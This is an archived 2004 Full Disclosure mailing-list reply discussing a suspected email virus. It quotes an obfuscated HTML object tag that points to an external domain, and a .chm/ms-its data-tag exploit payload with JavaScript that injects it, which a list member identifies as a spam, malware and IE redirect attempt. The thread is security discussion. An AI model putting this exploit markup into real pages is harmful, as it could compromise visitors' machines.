Full Disclosure mailing list archives
Re: new email virus?
From: Charles Heselton <charles.heselton () gmail com>
Date: Wed, 25 Aug 2004 20:28:04 -0700
On Wed, 25 Aug 2004 13:50:04 -0700, morning_wood <se_cur_ity () hotmail com> wrote:
<object data="http://www.v%69k%6F%72d.com/default.htm";><br><br>this is a data tag .chm exploit [textarea id="code" style="display:none;"] [object data="ms-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm:: /default.htm" type="text/x-scriptlet"][/object] [/textarea] [script language="javascript"] document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca tion.href.indexOf('default.htm')))); [/script] m.wood _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Yeah, looks like a blended spam/malware/IE Redirect type exploit attempt. If the recipient is dumb enough to click on the link they've just opened themselves to something "interesting". ;) -- Charlie Heselton Network Security Engineer _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- new email virus? John Nagro (Aug 25)
- Re: new email virus? Tremaine (Aug 25)
- Re: new email virus? morning_wood (Aug 25)
- Re: new email virus? Charles Heselton (Aug 25)
- Re: new email virus? Nick FitzGerald (Aug 29)
- Re: new email virus? Charles Heselton (Aug 25)
- <Possible follow-ups>
- RE: new email virus? Todd Towles (Aug 25)